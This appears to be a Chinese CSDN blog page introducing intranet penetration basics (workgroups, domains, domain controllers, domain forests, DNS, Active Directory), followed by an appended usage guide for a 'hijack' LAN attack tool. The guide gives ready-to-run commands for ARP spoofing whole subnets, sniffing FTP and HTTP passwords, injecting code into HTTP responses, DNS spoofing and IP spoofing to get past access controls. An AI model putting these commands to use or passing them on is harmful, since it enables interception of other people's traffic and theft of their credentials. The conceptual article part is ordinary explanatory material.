内网渗透基础知识

文章介绍了内网的基本概念,包括局域网和工作组的组织方式,强调了工作组的对等性和灵活性。然后深入到域的概念,指出域提供了更严格的权限管理,域控制器作为验证中心确保安全。还提到了域的不同类型如单域、父域、子域、域树和域森林,以及DNS服务器和活动目录在内网资源管理和定位中的关键作用。活动目录是域环境中的重要组件,负责目录服务和资源的集中管理。
摘要由CSDN通过智能技术生成

一、内网概述

内网也指局域网,是指在某一区域内又多台计算机互联成的计算机组。一般是方圆几千米内,局域网可以实现文件管理,应用软件共享,打印机共享,工作组内的历程安排,电子邮件和传真通信服务等功能。

内网是封闭型的,它可以由办公室的两台计算机组成,也可以由一个公司内的上千台计算机组成。例如银行、学校、工厂等。

关键词:工作组、域、域控制器(DC)、父域、子域、域树、域树林、活动目录(AD)、DMZ、域内权限

1.1 工作组

工作组:在一个大的单位内,肯有成百上千台电脑互相连接成局域网,他们都会列成在“网上邻居”内,如果这些电脑不分组,可想而知有多混乱,要找一台电脑很困难。为了解决这一问题,就有了“工作组”这个概念,将不同的电脑一般按功能、部门分别列入不同的工作组中,如技术部的电脑都列入“技术部”,行政部的都列入“行政部”。你要访问某个不买的资源,就在“网络”里找到那个部门的工作组名,双击就可以看到那个部门的所有电脑了。相比不分组的情况就有序的多了,尤其是对与大型局域网络来说。

1.1.1 加入/创建工作组

加入/创建工作组

右击桌面的“计算机”,在弹出的菜单出选择属性,点击更改设置,更改,在计算机名一栏中输入名称,在工作组一栏中输入你想加入的工作组名称。

如果你输入的工作组名称网络中没有,那么相当于新建一个工作组,当然暂时只有你的电脑在组内。单击确定按钮后,window提示需要重新启动,重新启动后,再进入网络就可以看到你所加入的工作组成员了。

 1.1.2 退出工作组

        只要将工作组名称改动即可。不过在网上被人照样可以访问你的共享资源。你也可以随便加入同一网络上的任何其他工作组。“工作组”就像一个可以自由进入和退出的“社团”,方便同一组的计算机互相访问。

        所以工作组并不存在真正的集中管理作用,工作组里的所有计算机都是对等的,也可以服务器和客户机之分。

1.2 域

域(Domain)是一个有安全边界的计算机集合(安全边界是在两个域中,一个域的用户无法访问另一个域中的资源),可以简单的把域理解成升级版“工作组”,相比工作组而言,他有一个严格的安全管理控制机制,如果你想访问域内的资源,必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。

域控制器(Domain controller,简称DC)是一个域中的一台类似管理服务器的计算机,相当于一个单位的门卫一样,他负责每一台联入的电脑和用户的验证工作,域内电脑如果想互相访问,首先都是经过他的审核。

域的分类有:单域,父域,子域,域树,域森林,DNS域名服务器

1.2.1 单域 

在一般的具有固定地理位置的小公司里,建立一个域就可以满足需求。

一般在一个域内要建立至少两个域服务器,一个作为DC,一个是备份DC。如果没有第二个备份DC,娜美一旦DC瘫痪了,则域内的其他用户就不能登录该域了,因为活动目录的数据库是存储在DC中的。而有一台备份域控制器(BDC),则至少该域还能正常使用,期间把瘫痪的DC恢复了就行。

1.2.2 父域

出于管理及其他一些需求,需要在网络中划分多个域,第一个域称为父域,各部分的域称为该域的子域。

比如一个大公司,他的不同分公司在不同的地理位置,则需父域及子域这样的结构。

如果把不同地理位置的分公司放在同一个域内,那么他们之间信息交互(包括同步,复制等)所花费的时间会比较长,而且占用的带宽也比较大。(在同一个域内,信息交互的条目很多,而且不压缩;域和域之间,信息交互条目较少,而且压缩)

还有一个好处,是子公司可以通过自己的域来管理自己的资源。

其他情况,是处于安全策略的考虑,因为每个雨都有自己独有的安全策略。比如一个公司的财务部门希望能使用特定的安全策略,娜美可以将财物部门做成一个子域来单独管理。

1.2.3 域树

域树指若干个域通过建立信任关系组成的集合。一个域管理远只能管理本域的内部,不能访问或管理其他的域,两个域之间相互访问则需要建立信任关系。

信任关系是连接在域与域之间的桥梁,域树内的父域和子域之间不但可以按需要互相管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。

在一个域树中,父域可以包含很多子域,子域是相对父域来说的,指域名中的每一段。子域只能使用父域作为域名的后缀,也就是说在一个域树中,域的名字是连续的。

 1.2.4 域森林

域森林指若干个域树通过建立信任关系组成的集合。可以通过域树之间建立的信任关系来管理和使用整个森林中的资源,从而又保持了原有域自身的特性。

1.3 DNS域名服务器

DNS域名服务器是进行域名和与之相对应的IP地址转换的服务器。

在域树的介绍中,可以看到域树中的域名字和DNS域的名字非常相似,实际上域的名字就是DNS域的名字,因为域中的计算机使用DNS来定位域控制器和服务器以及其他计算机,网络服务器等。

一般情况下,我们在内网渗透时就通过寻找DNS服务器来定位域控制器,因为通常DNS服务器和域控制器会在同一台机器上。

1.4 活动目录

活动目录是域环境中提供目录服务的组件。

目录是什么?目录就是存储有关网络对象(如用户、组、计算机、共享资源、打印机和联系人等)的信息。目录服务是帮助用户快速准确的从目录中查找他所需要的信息的服务。

如果将企业的内网看成一本字典,那么内网里的资源就是字典的内容,活动目录就是相当于字典的索引。即活动目录存储的是网络中所有资源的快捷方式,用户通过寻找快捷方式而定位资源。

1.4.1 逻辑结构

在活动目录中,管理员可以完全忽略被管理对象的具体地理位置,而将这些对象按照一定的方式放置在不同的容器中。由于这种组织对象的做法不考虑被管理对象的具体地理位置,这种组织框架称为“逻辑结构”。

活动目录的逻辑结构就包括上面讲到的组织单元(OU)、域(domain)、域树(tree)、域森林(forest)。在域树内的所有域共享一个活动目录,这个活动目录内的数据分散地存储在各个域内,且每一个域只存储该域内的数据。

1.4.2 活动目录主要功能

  • 账号集中管理,所有账号存在服务器上,方便对账号的重命令/重置密码。
  • 软件集中管理,统一推送软件,统一安全网络打印机等。利用软件发布策略分发软件,可以让用户自由选择安装软件。
  • 环境集中管理,利用AD可以统一客户端桌面,IE,TCP/IP等设置。
  • 增强安全性,统一部署杀毒软件和扫毒任务,集中化管理用户的计算机权限、统一制订用户密码策略等,可监控网络,资料统一管理。
  • 更可靠,更少的宕机时间。如:利用AD控制用户访问权限,利用群集负载均衡等技术对文件服务器进行容灾设定,更可靠,宕机时间更少。
  • 活动目录为Microsoft统一管理的基础平台,其他isa,exchange,sms等服务都依赖这个基础平台。

AD和DC的区别·

  • 如果网络规模较大,我们就会考虑把网络中的众多对象:计算机、用户、用户组、打印机、共享文件等,分门别类、尽然有序的放在一个大仓库中,并做好检索信息,以利用查找、管理和使用这些对象。这个有层次结构的数据库,就是活动目录数据库,简称AD库
  • 那么我们应该把这个数据库放在那台计算机上呢?规定是这样的,我们把存放有活动目录数据库的计算机就称为D C。所以我们实现域环境,其实就是安装AD,当内网中的一台计算机安装AD后,他就变成了DC。
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
局域网渗透软件 usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile> <-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag> <-IO pcap_dump> <-E quit time> <-R reboot time> <-b submask> <-m speed> <Source Host> <Dest Host> <match expression> <bpf filter> | <genuine host> <faked host> -h is help/usage 显示帮助信息 -V is version information 显示版本信息 -v is be verbose 程序运行时显示详细信息 -q is be quiet (don't print packet reception hash marks) 安静模式,不显示数据包标识 -e is show empty packets 显示空的数据包 -o is fixed '\0' after replace data offset 替换数据后,被替换的数据后都用空字节'\0'填充 -i is ignore case 忽略大小写进行匹配 -S is spoof interval default is 3000 ms 设置发送RARP欺骗的时间间隔,不能设太大,不然程序会死,条件竞争问题 针对攻击一些反ARP欺骗的主机, 越小越好 -l is set logfile to record 设置日专记录文件,日志记录文件将程序运行输出的内容再记录的文件里 -r is enabled ip routing 开启系统内置的路由功能,只能嗅探,不能修改数据包 -b is to force define submask 强制指定子网掩码,对一些跨网段的欺骗有效 -m is define max transmit speed k/s 限制最大网络传输速度 k/s -f is set full spoof-route mode default is half 设置欺骗方式为双向欺骗 -x is print in alternate hexdump format 打印出来的数据为十六进制 -X is interpret match expression as hexadecimal 设置要匹配的字串为十六进制,如0x0d0a00 -p is the port to hijack 设置要进行数据劫持的端口,默认为全部 -c is the flag string to insert for http hijack 要插入代码的HTTP响应包的特征字符串,默认为200 OK -I is read packet stream from pcap format file pcap_dump 从一个pcap数据包格式的文件里读取数据包,进行离线嗅探 -D is dnsspoof mode 模式改变为DNS欺骗,规则文件格式不变 -t is print timestamp every time a packet is matched 当有匹配的数据包时,打出时间戳 -E is time to quit # 程序自动退出的时间间隔,按秒计算 -R is time to reboot program # 程序自动重新启动的时间间隔,按秒计算 -N is release demo job file 释放一规则文件 -s is scan hosts in subnet 扫描子网 -H is hidden from console, background mode killed /k 从控制台隐藏到后到执行,可以用hijack -k 结束 -k is killed a exists instance 结束一个存在的实例 -O is dump matched packets in pcap format to pcap_dump 保存匹配的数据包到一个pcap数据包格式的文件里 -W is set the dump format (normal, byline, none) 设置数据包显示的格式,一般,按行,无格式三种 -F is read the filter from the specified file 从指定的文件里读取规则 -z is IP faked mode genuine and faked host variable auto switch full spoof# 进行IP伪造genuine host 和 faked host生效, 自动打开全双工选项 -d is use specified device (index) 使用指定网卡的索引号 -L is show the winpcap device list index 显示网卡列表 ______________________________________________________________________________________________________________________ // 常用功能举例说明 显示网卡列表 hijack /L 扫描子网 hijack /sd3 结束一个现有的实例 hijack /k ______________________________________________________________________________________________________________________ // 嗅探功能举例说明 嗅探子网,程序自动转发 (可以匹配,但不能设置过滤规则) hijack /d3 192.168.16.* 192.168.16.1 嗅探子网,同上, 双向欺骗 hijack /fd3 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行 hijack /Hfd3 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动退出 hijack /Hfd3 /E 120 192.168.16.* 192.168.16.1 嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动重新运行 hijack /Hfd3 /R 120 192.168.16.* 192.168.16.1 嗅探子网,程序自动转发,发送RARP欺骗包间隔为100微秒 hijack /d3 /S 100 192.168.16.* 192.168.16.1 嗅探子网,同上, 强制指定子网掩码为255.255.255.0 hijack /d3 /S 100 /b 255.255.255.0 192.168.16.* 192.168.16.1 嗅探子网,系统自动转发 (效率高, 可以设置BPF规则) 以下为嗅探FTP密码 "|" 为条件分隔符 hijack /rqd3 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21" 同上,将信息保存到pass.log里,pass.log里有详细的FTP密码信息 hijack /rqd3 /l pass.log 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21" 嗅探子网,一些常见的HTTP密码, 不区分大小定(i选项打开), 保存数据包到pass.dat里 hijack /rqid3 /O pass.dat 192.168.16.* 192.168.16.1 "username=|password=" "tcp and dst port 80" 还原数据包数据,程序将显示嗅探到的数据包 hijack /I packet.dat 自定义要嗅探的主机用","分隔,如: hijack /rd3 192.168.16.3,192.168.16.8,192.168.16.10-20 192.168.16.1 ______________________________________________________________________________________________________________________ // 数据包修改功能举例说明 释放一个替则文件 hijack /N 释放的文件如下: ---- gzip ---- gxip ---- http-insert ---- <center>hijack</center> ---- 程序以"----"为分隔符,第一个字符串为原字符串,第二个字符串为替换后的字符串,最大长度都为256字节, 往下再重复 如果是原字符串为http-insert,表始要进行HTTP会话劫持,程序将下一条字符串插入到HTTP响应包里 劫持网关到子网之间的数据, 并显示详细信息 hijack /vd3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.* 修改后的数据用'\0'字符填充 hijack /vod3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.* 修改后的数据用'\0'字符填充 hijack /vod3 /p 80 /S 100 /F job.txt /c "404" 192.168.16.1 192.168.16.* ______________________________________________________________________________________________________________________ // DNS欺骗说明, 需打开-D选项 DNS欺骗与数据包修改唯一不同的就是规则文件,一个实例的DNS欺骗需要用的规则文件如下 ---- www.163.com ---- 192.168.16.3 ---- * ---- 192.168.16.1 ---- 欺骗后 就把www.163.com的IP解析成了192.168.16.3, 其它所有的都解析为192.168.16.1 DNS欺骗www.163.com为192.168.16.3 规则文件dns.txt如下 ---- www.163.com ---- 192.168.16.3 ---- 命令如下: hijack /Dvd3 /F dns.txt 192.168.16.* 192.168.16.1 注意: 实例中dns查询包是从内网到外网发送的,所以欺骗方向要注意 ______________________________________________________________________________________________________________________ // IP欺骗说明, 需打开-z选项 hijack /zd3 202.108.22.33 202.108.22.1 61.163.83.11 202.102.245.9 实例是在公网上实现的,如果202.108.22.33的21端口做了IP限制,只允许202.102.245.9访问(可以嗅探得到) 攻击者IP是61.163.83.11,则可以通到上面的命令突破IP限制 ______________________________________________________________________________________________________________________ // 网速限制说明 限制子网网速为20K/S, 本机不在统计内 hijack /fd3 /m 20 192.168.16.* 192.168.16.1 很好用的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值